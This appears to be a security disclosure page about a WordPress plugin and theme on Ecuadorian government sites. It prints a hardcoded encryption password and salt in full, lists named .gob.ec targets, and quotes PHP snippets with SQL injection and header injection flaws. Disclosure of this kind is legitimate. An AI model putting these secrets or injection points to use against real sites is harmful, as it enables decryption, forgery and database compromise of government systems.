ODINT
← Back to Cyber Tours

Oraculo Credentials

Oraculo Plugin — Exposed Credentials

Hardcoded Credentials

Password: SNAPsitio30v
Salt: ALRTOPER984TNMGDGFDH

Used in MCrypt encrypt()/decrypt() functions for data encryption between the oraculo centralized management server and individual government WordPress sites.

Impact

The Sitio-32 theme with oraculo plugin is deployed across ALL Ecuador government WordPress sites including:

  • presidencia.gob.ec (Presidency)
  • vicepresidencia.gob.ec (Vice Presidency)
  • comunicacion.gob.ec (Government Communications)
  • ecu911.gob.ec (Emergency Services)
  • arcotel.gob.ec (Telecom Regulator)
  • aduana.gob.ec (Customs)
  • And potentially hundreds more .gob.ec domains

The shared password and salt could allow:

  1. Decryption of all data encrypted by the oraculo plugin
  2. Forgery of encrypted payloads to inject content
  3. Combined with SQL injection vectors in the same theme, full database compromise

SQL Injection Vectors

ajax_selects.php

$id = $_POST['identificador'];
"...where relacion=" . $id . "..."

procesarContacto.php

$nombre = $_POST['nombre'];
"INSERT INTO contacto (nombre, apellido, cedula...) VALUES('$nombre','$apellido'..."

Additional Findings

  • MCrypt is deprecated since PHP 7.1 (removed in PHP 7.2)
  • No CSRF protection on form handlers
  • No input validation/sanitization
  • Unsafe email headers allowing header injection
  • Mobile-Detect 2.8.17 bundled (older version)

© 2026 Observatory for Digital Infrastructure and Network Transparency. Independent nonprofit.

Home | Privacy | Terms